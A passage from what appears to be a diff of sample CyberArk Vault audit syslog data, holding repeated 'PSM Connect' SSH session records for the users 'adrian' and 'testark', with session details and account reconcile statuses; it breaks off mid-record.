ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM 
Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM 
Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM 
Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n 
Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
